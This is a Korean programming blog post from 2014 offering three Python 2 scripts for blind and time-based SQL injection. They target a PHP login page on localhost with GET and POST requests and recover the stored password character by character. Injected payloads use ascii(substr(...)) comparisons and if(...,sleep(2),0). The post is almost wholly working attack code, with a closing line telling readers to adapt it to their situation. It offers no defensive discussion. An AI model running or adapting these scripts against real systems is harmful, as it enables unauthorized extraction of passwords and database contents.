본문으로 바로가기

Python Blind,Time Based SQL Injection Source

category Coding/Python 2014. 6. 15. 04:36

GET.py


POST TIME.py


POST.py


 

[GET]


import httplib

import urllib

result=''

length=1

string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

for i in range(1,100):

    if(length<i):

        break

    else:

        for j in range(0,76):

            headers={'Cookie':'PHPSESSID=nb978enqqm4teudnsp27vi9i25','Content-Type':'application/x-www-form-urlencoded'}

            conn=httplib.HTTPConnection('127.0.0.1')

            conn.request('GET','/pytest/get_ok.php?id=admin\'%20and%20ascii(substr(pw,'+str(i)+',1))='+str(ord(string[j]))+'%23&password=a','',headers)

            data=conn.getresponse().read()

            if 'Hello' in data:

                result=result+string[j]

                print str(i)+' Password is '+str(j)

                print result

                length=length+1

                break

            print str(i)+' -> '+string[j]

print 'Password is '+result




 

[POST]


import httplib

import urllib

result=""

length=1

string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

for i in range(1,100):

    if(length<i):

        break

    else:

        for j in range(0,76):

            headers={'Cookie':'PHPSESSID=j57q0n53cl5qhi1dhg527pq7o5','Content-Type':'application/x-www-form-urlencoded'}

            params=urllib.urlencode({"id":"admin' and ascii(substr(pw,"+str(i)+",1))="+str(ord(string[j]))+"#","pw":"1"})

            conn=httplib.HTTPConnection('127.0.0.1')

            conn.request('POST','/pytest/login_ok.php',params,headers)

            data=conn.getresponse().read()

            if 'Hello' in data:

                result=result+string[j]

                print str(i)+' Password is '+str(j)

                print result

                length=length+1

                break

            print str(i)+' -> '+string[j]

print 'Password is '+result


 

 

[POST - Time Based]

 

import httplib

import urllib

import time

result=""

length=1

string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

for i in range(1,100):

    if(length<i):

        break

    else:

        for j in range(0,76):

            headers={'Cookie':'PHPSESSID=ac7f41c5fc30d8c8d1f4dbc0fbbc0f04','Content-Type':'application/x-www-form-urlencoded'}

            params=urllib.urlencode({"id":"admin' and if(ascii(substr(pw,"+str(i)+",1))="+str(ord(string[j]))+",sleep(2),0)#","password":"1"})

            t1=time.time()

            conn=httplib.HTTPConnection('127.0.0.1')

            conn.request('POST','/pytest/login_ok.php',params,headers)

            data=conn.getresponse().read()

            t2=time.time()

            print str(i)+' -> '+string[j]

            if(t2-t1)>=2:

                    result=result+string[j]

                    print str(i)+' Password is '+string[j]

                    print result

                    length=length+1

                    break

            else:

                    continue

        print 'Password is '+result


 

상황에 맞게 수정하여 쓰면 된다.



다른 사람들이 많이 읽은 글

'Coding > Python' 카테고리의 다른 글

소켓 통신할때 Response 못받아오는 문제  (0) 2016.01.08
Selenium 경로설정  (0) 2016.01.08
DB Parser  (0) 2015.12.25
정렬 알고리즘  (0) 2015.03.09
파이썬 소켓 프로그래밍  (0) 2014.08.13
Python Blind,Time Based SQL Injection Source  (0) 2014.06.15

댓글을 달아 주세요